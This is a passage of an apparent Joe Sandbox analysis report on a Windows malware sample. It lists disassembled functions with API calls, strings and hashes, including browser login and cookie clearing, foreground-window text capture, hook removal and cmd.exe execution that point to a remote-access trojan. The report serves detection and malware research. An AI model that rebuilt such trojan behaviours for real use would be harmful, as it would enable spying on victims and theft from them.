                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                          • String ID: bad locale name
                                          • API String ID: 3628047217-1405518554
                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                          • String ID: !D@
                                          • API String ID: 186401046-604454484
                                          • Opcode ID: a068d85ce6d20572725b561f13a14384616ca358d13cf0a9e2740917865bf9e7
                                          • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                          • Opcode Fuzzy Hash: a068d85ce6d20572725b561f13a14384616ca358d13cf0a9e2740917865bf9e7
                                          • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $cmd.exe$open
                                          • API String ID: 587946157-3896048727
                                          • Opcode ID: f44f3a75cb8e05523d561960cc0be4386eb784bc6dcc6058ee8d5990d9ea8ce9
                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                          • Opcode Fuzzy Hash: f44f3a75cb8e05523d561960cc0be4386eb784bc6dcc6058ee8d5990d9ea8ce9
                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                          APIs
                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: DeleteDirectoryFileRemove
                                          • String ID: pth_unenc$xdF
                                          • API String ID: 3325800564-2448381268
                                          • Opcode ID: ad03ad6105e2805cf24512cd36e8b9a34d70bf8a7d384e6b6b2237e166b151ae
                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                          • Opcode Fuzzy Hash: ad03ad6105e2805cf24512cd36e8b9a34d70bf8a7d384e6b6b2237e166b151ae
                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                          APIs
                                          • TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                          • UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                          • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: TerminateThread$HookUnhookWindows
                                          • String ID: pth_unenc
                                          • API String ID: 3123878439-4028850238
                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                           Strings
                                           • Cleared browsers logins and cookies., xrefs: 0040C130
                                           • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                          • API String ID: 3472027048-1236744412
                                          • Opcode ID: 0eb67f22db26bfbf69fd8d2aa32761b673633ffd036242d8c1b92dd0b17869b7
                                          • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                          • Opcode Fuzzy Hash: 0eb67f22db26bfbf69fd8d2aa32761b673633ffd036242d8c1b92dd0b17869b7
                                          • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                          APIs
                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: Window$SleepText$ForegroundLength
                                          • String ID: [ $ ]
                                          • API String ID: 3309952895-93608704
                                          • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                          • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: SystemTimes$Sleep__aulldiv
                                          • String ID:
                                          • API String ID: 188215759-0
                                          • Opcode ID: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                          • Instruction ID: 34fec0fc5de9b46989c99fc374850f6e4511d06c61be9fc580282ef5e3b3a0c9
                                          • Opcode Fuzzy Hash: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                          • Instruction Fuzzy Hash: 4A1142B35043446BC304FBB5CD85DEF77ACEBC4359F040A3EF64A82061EE29EA498695
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize
                                          • String ID:
                                          • API String ID: 3919263394-0
                                          • Opcode ID: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                          • Opcode Fuzzy Hash: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                          APIs
                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                          APIs
                                          • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                          • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                          • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                          • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Similarity
                                          • API ID: MetricsSystem
                                          • String ID:
                                          • API String ID: 4116985748-0
                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                          APIs
                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                          • String ID:
                                          • API String ID: 1761009282-0
